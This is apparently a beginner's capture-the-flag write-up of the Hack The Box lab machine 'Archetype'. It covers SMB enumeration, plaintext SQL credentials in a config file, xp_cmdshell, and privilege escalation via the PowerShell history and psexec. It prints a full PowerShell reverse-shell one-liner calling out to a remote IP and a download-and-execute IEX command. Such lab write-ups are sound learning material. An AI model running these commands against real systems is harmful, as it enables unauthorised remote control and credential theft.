0x01-StartingPoint-Archetype

Help Desk

Before you read through my long, long article, there are some things you should know first.

  1. I included my whole thought process, so the article is very long. But I think telling you what's going through my mind is really important, since why is more valuable than how.
  2. All the thought process is in bold and italic.
  3. Side notes are wrapped between side-note markers; ignore them if you don't want the extra knowledge 😀
  4. If you are just looking for a solution, go directly to my video; it's clean, with every step demonstrated.

Chinese version:

  1. I have recorded my entire thought process, so the article has become very long. But I think this is the right way to share, because why is more important than how.
  2. All of the thought process is in bold and italic (if you don't want to read it, just skip it).
  3. There are some side notes, wrapped in a pair of side-note markers, which expand on certain points; if you don't need those, just skip them 😀
  4. If you only want the solution, click straight through to my video, which shows the most direct way to solve it, quick and time-saving.

Archetype Walkthrough Video! :D

HTB-Archetype

An article paired with a video makes for a perfect learning experience.

Today I am delivering this write-up of the first machine I am ever going to hack.

I am what people call a noob! I know nothing. I am a completely empty glass. So I will log each and every move I take during the whole journey, until I am really, really stuck; then I will check out some walkthroughs written by others.

As we go along, the hacking process will become more and more systematic. I will form my own workflow for dealing with different kinds of problems. And that's good: things are moving and getting better and better.

I will also record a video, but the video is a redo, which means it will not contain any of the thought process, so it's clean and time-saving.

Let's get started.

Set up

The victim machine is at IP address 10.10.10.27.
[screenshot: victim machine]
By the way, HTB needs you to set up a VPN to connect to its machines; refer to their tutorial, it's quite clear.

First things first - Nmap

I recall from my first lesson that everything starts with nmap: list the open ports and run the default scripts (-sC) to find potential vulnerabilities.

Let's do it.

Nmap result here:

# Nmap 7.80 scan initiated Wed Apr 15 00:56:39 2020 as: nmap -sC -sV -p135,139,445,1433,5985,14803,47001,49664,49665,49666,49667,49668,49669 -o nmap.txt 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up (0.25s latency).

PORT      STATE  SERVICE      VERSION
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open   ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-04-15T02:23:29
|_Not valid after:  2050-04-15T02:23:29
|_ssl-date: 2020-04-15T05:12:26+00:00; +13m51s from scanner time.
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
14803/tcp closed unknown
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   unknown
49666/tcp open   unknown
49667/tcp open   unknown
49668/tcp open   unknown
49669/tcp open   msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h37m50s, deviation: 3h07m51s, median: 13m50s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-04-14T22:11:42-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-15T05:11:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 15 00:58:42 2020 -- 1 IP address (1 host up) scanned in 123.84 seconds

The most important info I can get from this scan is as follows:

139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open   ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM

The server is running Microsoft SQL Server 2017 14.00.1000.00 and SMB file sharing (called Samba in this write-up; on this Windows Server host it is Microsoft's built-in SMB service, but the same enumeration tools apply).

The first thing that comes to mind is that Samba is notorious for being unreliable.

I want to narrow things down and focus on this piece of information, because I'm a noob 😀
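As an added example (not code from the original post), here is a small Python parser that pulls the port table and the SMB host-script findings out of nmap's normal output, which is how a defender would turn the scan above into an actionable list. The embedded excerpt is a constructed, trimmed copy of that scan.

```python
import re

# Constructed excerpt in the shape of the `nmap -sC -sV` normal output above
# (trimmed to the rows and host-script lines this parser cares about).
NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.27
Host is up (0.25s latency).

PORT      STATE  SERVICE      VERSION
135/tcp   open   msrpc        Microsoft Windows RPC
445/tcp   open   microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open   ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|_  Product_Version: 10.0.17763
14803/tcp closed unknown

Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_    Message signing enabled but not required
"""

# One PORT/STATE/SERVICE/VERSION row; script output lines start with '|' and never match.
PORT_ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_ports(text):
    """Return one dict per port row: port, proto, state, service, version."""
    rows = []
    for line in text.splitlines():
        m = PORT_ROW.match(line)
        if m:
            rows.append({"port": int(m.group(1)), "proto": m.group(2),
                         "state": m.group(3), "service": m.group(4),
                         "version": m.group(5).strip()})
    return rows

def interesting_ports(rows):
    """Open SMB and MSSQL ports, the two services the write-up decides to focus on."""
    focus = {"netbios-ssn", "microsoft-ds", "ms-sql-s"}
    return [r["port"] for r in rows if r["state"] == "open" and r["service"] in focus]

def smb_findings(text):
    """Turn the smb-security-mode / smb2-security-mode script output into findings a
    defender would act on (signing that is off or optional leaves SMB sessions open to tampering)."""
    findings = []
    if re.search(r"message_signing:\s*disabled", text):
        findings.append("SMB1 message signing disabled")
    if "Message signing enabled but not required" in text:
        findings.append("SMB2 message signing not required")
    if re.search(r"account_used:\s*guest", text):
        findings.append("guest/null session accepted")
    return findings
```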

Enumerate Samba

So I googled "pentest samba list vulnerabilities" and read through three articles. The links are pasted below.

Enumerate Smb with smbmap

Samba Pentest

Kali docs for smbmap

What I've learned so far: there are two tools I can use to enumerate this SMB service on the victim machine, one is smbmap, the other is smbclient.

I'll do them one by one.

smbmap
I read through smbmap's help message, then tried lots of times; it seems unreliable, since nothing was gathered.

Move to smbclient.

smbclient
This is much better: just leave root's password empty.

I tried to connect to each of the shares by issuing smbclient \\\\10.10.10.27\\[dirname]; it seems I can access the backups share with no authentication.

[screenshot: smbclient connect]
Why four slashes? Seriously, I don't know. Just remember to do that. (The shell consumes one level of backslash escaping, so \\\\10.10.10.27\\backups reaches smbclient as \\10.10.10.27\backups, the usual UNC path.)

I saw that there's a single file in the share. Let's download it and check the content.

[screenshot: smbclient download]
The get command will do it. After downloading, just enter exit to leave smbclient.

Let's check the content.

prod.dtsConfig
Link to what a dtsConfig file is.

I like to grep for anything like password, pass or username, since these are all sensitive pieces of information.

[screenshot: credentials found]
That easy! The file does contain username and password info.
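As an added example (not code from the original post), this Python snippet does the same check as the grep above in a structured way: it parses a .dtsConfig file, splits each ConfiguredValue connection string into keys, reports the credential-bearing ones, and can redact them. The sample file is constructed; the password and the file path are placeholders, not values from the box.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the layout of an SSIS .dtsConfig file. The credential values are
# placeholders, not the ones recovered from the box.
SAMPLE_DTSCONFIG = """<?xml version="1.0"?>
<DTSConfiguration>
  <Configuration ConfiguredType="Property" ValueType="String"
      Path="\\Package.Connections[Destination].Properties[ConnectionString]">
    <ConfiguredValue>Data Source=.;Password=PLACEHOLDER_PASSWORD;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Connection-string keys that carry credentials (compared lower-cased).
SECRET_KEYS = {"password", "pwd", "user id", "uid"}

def parse_connection_string(value):
    """Split an OLE DB / ADO connection string into a lower-cased key -> value dict."""
    pairs = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            pairs[key.strip().lower()] = val.strip()
    return pairs

def find_credentials(xml_text):
    """Return (property path, key, value) for every credential key found in any
    <ConfiguredValue>; this is what the manual grep for 'password' found above."""
    hits = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        for key, val in parse_connection_string(node.text).items():
            if key in SECRET_KEYS:
                hits.append((conf.get("Path", ""), key, val))
    return hits

def redact(xml_text):
    """Blank out Password/Pwd values so the config can be stored or shared without the secret."""
    return re.sub(r"(?i)(password|pwd)=[^;<]*", r"\1=***", xml_text)
```

The real lesson for a defender is that a backup share readable without authentication is the finding, and any config that embeds a plaintext connection string should be kept out of such shares or redacted as shown.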

But one thing I should figure out is: what are the username and password for, and how can I use them?

So, back to the info I gathered in the nmap step: I saw that there's a Microsoft SQL Server running on the machine. Best guess, the username and password are for that SQL server.

Then I have to figure out how to use the credentials to log in to that SQL server.

Need to google.

The first article, which contains a whole lot of information, teaches me that since I've got the username and password, I can do a ton of stuff with the SQL server. To name but a few: enumerate MSSQL configuration settings, identify SQL Server logins, identify the database owner, identify a user with admin privileges, execute SQL statements, etc.

Read it yourself, you'll get hyped!

Quick note:
If it is the first time you run the Metasploit CLI, do msfdb init first, and systemctl enable postgresql to start PostgreSQL on system boot; this brings up msfconsole much quicker.

[screenshot: init msfdb]
[screenshot: mssql payload]
I'll try this out. I have the password, and this will gain us a Meterpreter shell. Much excited!

[screenshot: options]
[screenshot: set options]
[screenshot: nc]
I set all the options and used nc to listen on port 9001. Let's exploit and pray.

[screenshot: options]
Oh, and don't forget to set lport to 9001 too; that is where the reverse shell will connect to.

[screenshot: failed]

Failure expected… I must have messed up the options.

[screenshot: options]

I changed srvport to something else; let's try again.

[screenshot: options]

It's because I didn't have to set up nc to listen on port 9001: the Metasploit module starts its own handler on LHOST:LPORT, so an nc already bound to that port gets in the way. Be aware to turn off any nc listening on port 9001.

Credential problems. Options messed up again. Checking…

It just kept failing…

I tried the auxiliary/admin/mssql/mssql_enum module, and first I got bad credentials again, meaning I had messed up the username, which I was pretty sure about because there's a backslash in the username (ARCHETYPE\sql_svc). So I removed the first part and left the username as sql_svc; with the option USE_WINDOWS_AUTHENT set to false, I got the bad credentials error again. So I set that last option to true, got in, and had the SQL server enumerated.

[screenshot: enum]
And this is an article about Windows Authentication. It turns out SQL Server supports different types of authentication. Go check it out!

Let's try the meterpreter shell again.

[screenshot: options]
[screenshot: exploiting]

It should work now 😀

[screenshot: failure]
Nope. I had to check out other payloads; if nothing fit, I would search for other methods.

[screenshot: payloads]
I would try reverse_http. Last attempt for this module.

[screenshot: reverse_http]
Failed again. Let's just leave it and search for some other method.

I went through my tools list again and saw Impacket. I googled "impacket exploit mssql server", and this GitHub page showed up.

Impacket mssqlclient.py Github

Let's check out the help message.

[screenshot: mssqlclient.py help]
I saw no proxy flag, and I do want to see what's going on behind the screen. Never mind, I can run tcpdump and use Wireshark to check out the data.

[screenshot: tcpdump]
I'm capturing everything on tun0 here.

Let's connect with mssqlclient.py.

Side Notes Start

[screenshot: wireshark]
[screenshot: tds]
There's something to learn here: what is the TDS protocol? Follow the link to learn.

[screenshot: ntlmssp_auth]
What is NTLMSSP_AUTH?

Because the messages run inside TLS, there's not much I can extract. Just these two points are worth reading.

Side Notes End

[screenshot: mssqlclient connection]

I think I have to append -windows-auth here due to my prior reading. It works. We are in the SQL server now.

MS SQL Server

Where can I go from here?

The first thing I thought of is to check who I am on the server and what my privileges are; in other words, am I an admin or in an admin group or something.

By googling "microsoft sql server check user is admin", I found the function that checks whether the current login is a member of a server role: IS_SRVROLEMEMBER().

IS_SRVROLEMEMBER reference.

And these are the options that go into the parentheses.

[screenshot: options]

The one we need here, I think, should be sysadmin.

[screenshot: example]

This is an example.

[screenshot: sysadmin]

The function name can be either uppercase or lowercase.
The server returned 1.

[screenshot: current_user]
The current user is dbo and a system admin, which means I can do whatever I want.

In this article, there's something called xp_cmdshell; it can execute arbitrary OS commands from within the server. Since I am now admin, I can do all kinds of crazy stuff.

Add a User to the System

Let's add a user to the system.
[screenshot: add user]
Adding a user failed. And on second thought, this is not an ideal way to do it, because the user I add may not be an admin.

[screenshot: cd]
And I cannot access the administrator's directories.

Reverse Shell from Inside

Since I can do whatever I want, that includes uploading or downloading files.

Just like when you get into a Linux machine, where it's second nature to check if python or nc exists, when you're on a Windows machine you will have PowerShell at your disposal.

[screenshot: powershell]
I can pass commands directly to PowerShell to execute.

And now I can search for a shell, pass it to PowerShell, and let it execute to connect back to my machine, thus getting a shell on the box.

I searched for "powershell reverse shell" and got this cheatsheet on reverse shells.

Open up nc to listen to port 9001.

And let's execute the reverse shell.

I chose powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", but got an error.

[screenshot: error message]
The argument is too long.

So I should use the third one: download and execute a script hosted on my machine.

Save $client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() to a file.

IMPORTANT NOTE:
If the above code fails, just remove the 'PS ' + (pwd).Path + '> ' part, replace it with "# " and try again.

[screenshot: save shell file]
And set up a Python HTTP server to host the file.

[screenshot: http server]

And use IEX (New-Object Net.WebClient).DownloadString('ip/filename') in PowerShell to download and execute the file.

[screenshot: xp_cmdshell]
[screenshot: user shell]
[screenshot: whoami]

Privilege Escalation

Notes:
When getting into a Windows machine, reading the PowerShell history file is a MUST DO!

[screenshot: powershell history]
Got admin credentials.

I googled "pentest login to windows with username and password" and found this page.

Impacket came up again, with psexec.py.

Let's do it!

[screenshot: flag]
I'm in…

SP_CONFIGURE

After checking the walkthrough: when I log in to the SQL server, I also have to run sp_configure to set some options to 1 in order to make everything work. show advanced options and xp_cmdshell should both be set to one with exec sp_configure '[option]', 1;. Fortunately, the server is already configured that way.

This is still recorded in my video.